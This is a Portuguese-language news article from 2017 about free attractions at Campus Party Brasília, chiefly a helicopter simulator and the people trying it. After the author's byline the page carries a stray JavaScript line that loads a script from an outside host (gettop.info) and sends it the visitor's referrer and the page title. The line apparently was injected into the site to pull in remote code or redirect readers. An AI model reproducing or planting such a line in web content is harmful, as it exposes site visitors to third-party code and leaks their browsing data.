Público testa simuladores e outras atrações gratuitas na Campus Party

BSB Capital 15/06/2017 às 17:51, Atualizado em 18/09/2017 às 21:17

Marcos Vinícius Andrade, de 23 anos, comandou um helicóptero por simulação. Área gratuita do evento segue aberta até sábado para visitantes

Já nas primeiras horas após a abertura da Open Campus, no fim da manhã, o empreendedor Marcos Vinícius Andrade, de 23 anos, aproveitou para testar um simulador de helicóptero. Foto: Gabriel Jabur/Agência Brasília

Até sábado (17), o público brasiliense pode conhecer novidades no ramo de tecnologia e inovação e ainda se divertir com as atrações do espaço gratuito da Campus Party Brasília. Já nas primeiras horas após a abertura, no fim da manhã, o empreendedor Marcos Vinícius Andrade, de 23 anos, aproveitou para testar um simulador de helicóptero.

“Eu não consegui comprar ingresso e vim para a Campus fazer contatos e participar das palestras na área livre. Nunca andei de helicóptero, mas a sensação no simulador é de estar voando mesmo”, contou sobre a experiência.

O simulador na Open Campus é do empresário formado em ciência da computação João Pagotto, de 32 anos. “Comecei por hobby e fui aprimorando, já fiz de avião também.” Ele trabalha a partir de um software com a simulação dos voos, daí em diante adapta tudo para que o controle da aeronave seja o mais real possível, com pedal, painel e manche (a alavanca de comando).

Pagotto comercializa os equipamentos para escolas de treinamento de pilotos. “No Brasil, eu só não fui na primeira edição, depois participei de todas as Campus. A chegada a Brasília é legal porque é um público diferente. Os visitantes se divertem, mas consigo maior divulgação e possíveis negócios”, avalia.

Outras atividades disponíveis eram o uso de óculos de realidade virtual e a simulação de voo de asa-delta. Essas atrações estavam na lista de prioridade de Eduardo Ávila, de 10 anos.

Na fila desde as 9h15 com a família — a Open Campus abre às 10 horas —, ele aguardava ansioso para experimentar os equipamentos. “Tenho medo de altura. Acho que vou sentir uma aflição, mas vou encarar o asa-delta”, disse o menino, que planeja ser engenheiro de robótica no futuro.

Hoje (15) e amanhã (16), a Open Campus estará aberta até as 21 horas, e os visitantes poderão permanecer até as 22 horas. No sábado (17), o horário de funcionamento será das 10 às 18 horas, com circulação permitida até as 19 horas.

Amanda Martimon, da Agência Brasília

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deixe um comentário

Rolar para cima